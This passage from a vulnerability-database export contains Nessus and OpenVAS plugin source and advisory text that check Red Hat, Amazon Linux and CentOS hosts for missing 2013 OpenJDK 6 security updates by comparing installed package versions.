);\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2383\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2384\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2421\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2420\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2424\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2426\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1557\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0770\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.40.1.11.11.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-1.61.1.11.11.el6_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:13:54", "bulletinFamily": "scanner", "description": "Multiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569 , CVE-2013-2383 , CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558 , CVE-2013-2422 , CVE-2013-1518 ,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431 , CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429 , CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488 , CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component", "modified": "2019-11-02T00:00:00", "id": "ALA_ALAS-2013-185.NASL", "href": "https://www.tenable.com/plugins/nessus/69744", "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : java-1.6.0-openjdk (ALAS-2013-185)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2013-185.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69744);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/10 16:04:12\");\n\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\", \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\", \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\", \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\", \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_xref(name:\"ALAS\", value:\"2013-185\");\n script_xref(name:\"RHSA\", value:\"2013:0770\");\n\n script_name(english:\"Amazon Linux AMI : java-1.6.0-openjdk (ALAS-2013-185)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws were discovered in the font layout engine in the 2D\ncomponent. An untrusted Java application or applet could possibly use\nthese flaws to trigger Java Virtual Machine memory corruption.\n(CVE-2013-1569 , CVE-2013-2383 , CVE-2013-2384)\n\nMultiple improper permission check issues were discovered in the\nBeans, Libraries, JAXP, and RMI components in OpenJDK. An untrusted\nJava application or applet could use these flaws to bypass Java\nsandbox restrictions. (CVE-2013-1558 , CVE-2013-2422 , CVE-2013-1518 ,\nCVE-2013-1557)\n\nThe previous default value of the java.rmi.server.useCodebaseOnly\nproperty permitted the RMI implementation to automatically load\nclasses from remotely specified locations. An attacker able to connect\nto an application using RMI could use this flaw to make the\napplication execute arbitrary code. (CVE-2013-1537)\n\nThe 2D component did not properly process certain images. An untrusted\nJava application or applet could possibly use this flaw to trigger\nJava Virtual Machine memory corruption. (CVE-2013-2420)\n\nIt was discovered that the Hotspot component did not properly handle\ncertain intrinsic frames, and did not correctly perform MethodHandle\nlookups. An untrusted Java application or applet could use these flaws\nto bypass Java sandbox restrictions. (CVE-2013-2431 , CVE-2013-2421)\n\nIt was discovered that JPEGImageReader and JPEGImageWriter in the\nImageIO component did not protect against modification of their state\nwhile performing certain native code operations. An untrusted Java\napplication or applet could possibly use these flaws to trigger Java\nVirtual Machine memory corruption. (CVE-2013-2429 , CVE-2013-2430)\n\nThe JDBC driver manager could incorrectly call the toString() method\nin JDBC drivers, and the ConcurrentHashMap class could incorrectly\ncall the defaultReadObject() method. An untrusted Java application or\napplet could possibly use these flaws to bypass Java sandbox\nrestrictions. (CVE-2013-1488 , CVE-2013-2426)\n\nThe sun.awt.datatransfer.ClassLoaderObjectInputStream class may\nincorrectly invoke the system class loader. An untrusted Java\napplication or applet could possibly use this flaw to bypass certain\nJava sandbox restrictions. (CVE-2013-0401)\n\nFlaws were discovered in the Network component's InetAddress\nserialization, and the 2D component's font handling. An untrusted Java\napplication or applet could possibly use these flaws to crash the Java\nVirtual Machine. (CVE-2013-2417 , CVE-2013-2419)\n\nThe MBeanInstantiator class implementation in the OpenJDK JMX\ncomponent did not properly check class access before creating new\ninstances. An untrusted Java application or applet could use this flaw\nto create instances of non-public classes. (CVE-2013-2424)\n\nIt was discovered that JAX-WS could possibly create temporary files\nwith insecure permissions. A local attacker could use this flaw to\naccess temporary files created by an application using JAX-WS.\n(CVE-2013-2415)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2013-185.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update java-1.6.0-openjdk' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet Driver Manager Privileged toString() Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:java-1.6.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-1.6.0.0-61.1.11.11.53.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-debuginfo-1.6.0.0-61.1.11.11.53.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-demo-1.6.0.0-61.1.11.11.53.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-devel-1.6.0.0-61.1.11.11.53.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-javadoc-1.6.0.0-61.1.11.11.53.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"java-1.6.0-openjdk-src-1.6.0.0-61.1.11.11.53.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-openjdk / java-1.6.0-openjdk-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:55", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-04-25T00:00:00", "id": "OPENVAS:1361412562310881724", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881724", "title": "CentOS Update for java CESA-2013:0770 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0770 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881724\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-25 10:24:15 +0530 (Thu, 25 Apr 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\",\n \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for java CESA-2013:0770 centos5\");\n\n script_xref(name:\"CESA\", value:\"2013:0770\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-April/019705.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n Multiple flaws were discovered in the font layout engine in the 2D\n component. An untrusted Java application or applet could possibly use these\n flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-1569,\n CVE-2013-2383, CVE-2013-2384)\n\n Multiple improper permission check issues were discovered in the Beans,\n Libraries, JAXP, and RMI components in OpenJDK. An untrusted Java\n application or applet could use these flaws to bypass Java sandbox\n restrictions. (CVE-2013-1558, CVE-2013-2422, CVE-2013-1518, CVE-2013-1557)\n\n The previous default value of the java.rmi.server.useCodebaseOnly property\n permitted the RMI implementation to automatically load classes from\n remotely specified locations. An attacker able to connect to an application\n using RMI could use this flaw to make the application execute arbitrary\n code. (CVE-2013-1537)\n\n Note: The fix for CVE-2013-1537 changes the default value of the property\n to true, restricting class loading to the local CLASSPATH and locations\n specified in the java.rmi.server.codebase property. Refer to Red Hat\n Bugzilla bug 952387 for additional details.\n\n The 2D component did not properly process certain images. An untrusted Java\n application or applet could possibly use this flaw to trigger Java Virtual\n Machine memory corruption. (CVE-2013-2420)\n\n It was discovered that the Hotspot component did not properly handle\n certain intrinsic frames, and did not correctly perform MethodHandle\n lookups. An untrusted Java application or applet could use these flaws to\n bypass Java sandbox restrictions. (CVE-2013-2431, CVE-2013-2421)\n\n It was discovered that JPEGImageReader and JPEGImageWriter in the ImageIO\n component did not protect against modification of their state while\n performing certain native code operations. An untrusted Java application or\n applet could possibly use these flaws to trigger Java Virtual Machine\n memory corruption. (CVE-2013-2429, CVE-2013-2430)\n\n The JDBC driver manager could incorrectly call the toString() method in\n JDBC drivers, and the ConcurrentHashMap class could incorrectly call the\n defaultReadObject() method. An untrusted Java application or applet could\n possibly use these flaws to bypass Java sandbox restrictions.\n (CVE-2013-1488, CVE-2013-2426)\n\n The sun.awt.datatransfer.ClassLoaderObjectInputStream class may incorrectly\n invoke the system class loader. An untrusted Java application or applet\n could possibly use this flaw to bypass certain Java sandbox restrict ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.40.1.11.11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2013-04-25T00:00:00", "id": "OPENVAS:1361412562310870988", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870988", "title": "RedHat Update for java-1.6.0-openjdk RHSA-2013:0770-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for java-1.6.0-openjdk RHSA-2013:0770-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.870988\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-04-25 10:18:55 +0530 (Thu, 25 Apr 2013)\");\n script_cve_id(\"CVE-2013-0401\", \"CVE-2013-1488\", \"CVE-2013-1518\", \"CVE-2013-1537\",\n \"CVE-2013-1557\", \"CVE-2013-1558\", \"CVE-2013-1569\", \"CVE-2013-2383\",\n \"CVE-2013-2384\", \"CVE-2013-2415\", \"CVE-2013-2417\", \"CVE-2013-2419\",\n \"CVE-2013-2420\", \"CVE-2013-2421\", \"CVE-2013-2422\", \"CVE-2013-2424\",\n \"CVE-2013-2426\", \"CVE-2013-2429\", \"CVE-2013-2430\", \"CVE-2013-2431\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for java-1.6.0-openjdk RHSA-2013:0770-01\");\n\n script_xref(name:\"RHSA\", value:\"2013:0770-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-April/msg00035.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.6.0-openjdk'\n package(s) announced via 